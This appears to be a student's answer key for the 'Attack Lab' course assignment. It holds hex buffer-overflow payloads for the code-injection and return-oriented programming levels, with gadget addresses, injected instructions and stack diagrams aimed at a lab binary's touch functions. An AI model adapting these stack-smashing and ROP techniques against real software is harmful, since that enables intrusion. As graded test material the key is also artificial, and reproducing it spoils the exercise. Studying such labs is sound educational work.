Attack Lab

CI: Level 1

32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32
1a 18 40 00 00 00 00 00

CI: Level 2

32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32
00 00 00 00 00 00 00 00 00 00 00 00
48 c7 c7 ea b5 3d 28    /* movq $0x283db5ea, %rdi */
c3                      /* ret */
a8 63 65 55 00 00 00 00 /* addr of 'movq $0x283db5ea, %rdi' */
48 18 40 00 00 00 00 00 /* addr of touch2 */

/*
	+----------------------------+
	addr of touch2                 <--- %rsp after 'ret'
	+----------------------------+
	addr of 'movq $0x283db5ea, %rdi' <--- %rsp
	+----------------------------+
	ret | movq $0x283db5ea, %rdi
	+----------------------------+
	padding
	...
	+----------------------------+
*/

CI: Level 3

32 38 33 64 62 35 65 61 00 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32
00 00 00 00 00 00 00 00 00 00 00 00
48 c7 c7 78 63 65 55    /* movq $0x55656378, %rdi */
c3                      /* ret */
a8 63 65 55 00 00 00 00 /* addr of 'movq $0x55656378, %rdi' */
5f 19 40 00 00 00 00 00 /* addr of touch3 */

/*
	+----------------------------+
	addr of touch3                 <--- %rsp after 'ret'
	+----------------------------+
	addr of 'movq $283db5ea, %rdi' <--- %rsp
	+----------------------------+
	ret | movq $283db5ea, %rdi
	+----------------------------+
	padding
	...
    <hex rep. of cookie>...
	+----------------------------+
*/

ROP: Level 2

32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32
/* 401a16: 8d 87 49 58 c3 42, '58' for 'popq %rax' */
19 1a 40 00 00 00 00 00
/* cookie */
ea b5 3d 28 00 00 00 00
/* 401a0f: c7 07 48 89 c7 90, '48 89 c7' for 'movq %rax, %rdi', '90' for 'nop' */
11 1a 40 00 00 00 00 00
/* addr of touch2 */
48 18 40 00 00 00 00 00

ROP: Level 3

32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32

11 1a 40 00 00 00 00 00 /* %rax -> %rdi (1) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (1) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (1) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (1) */
3e 1a 40 00 00 00 00 00 /* %rdi + %rsi -> %rax (2) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (2) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (2) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (2) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (2) */
3e 1a 40 00 00 00 00 00 /* %rdi + %rsi -> %rax (4) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (4) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (4) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (4) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (4) */
3e 1a 40 00 00 00 00 00 /* %rdi + %rsi -> %rax (8) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (8) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (8) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (8) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (8) */
3e 1a 40 00 00 00 00 00 /* %rdi + %rsi -> %rax (16) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (16) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (16) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (16) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (16) */
3e 1a 40 00 00 00 00 00 /* %rdi + %rsi -> %rax (32) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (32) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (32) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (32) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (32) */

de 1a 40 00 00 00 00 00 /* %rsp -> %rax (addr - 32) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (addr - 32) */
3e 1a 40 00 00 00 00 00 /* %rdi (addr - 32) + %rsi (32) -> %rax (addr) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (addr) */
5f 19 40 00 00 00 00 00 /* addr of touch3 */
32 38 33 64 62 35 65 61 /* string */
00

=================================

// Solution 2

32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32 32 32 32 32
32 32 32 32 32 32
19 1a 40 00 00 00 00 00 /* popq %rax (0x20) */
20 00 00 00 00 00 00 00 /* offset val (0x20) */
ca 1a 40 00 00 00 00 00 /* %eax -> %ecx (0x20) */
0b 1b 40 00 00 00 00 00 /* %ecx -> %edx (0x20) */
51 1a 40 00 00 00 00 00 /* %edx -> %esi (0x20) */
de 1a 40 00 00 00 00 00 /* %rsp -> %rax (addr - 0x20) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (addr - 0x20) */
3e 1a 40 00 00 00 00 00 /* %rdi (addr - 0x20) + %rsi (0x20) -> %rax (addr) */
11 1a 40 00 00 00 00 00 /* %rax -> %rdi (addr - 0x20) */
5f 19 40 00 00 00 00 00 /* addr of touch3 */
32 38 33 64 62 35 65 61 /* string */
00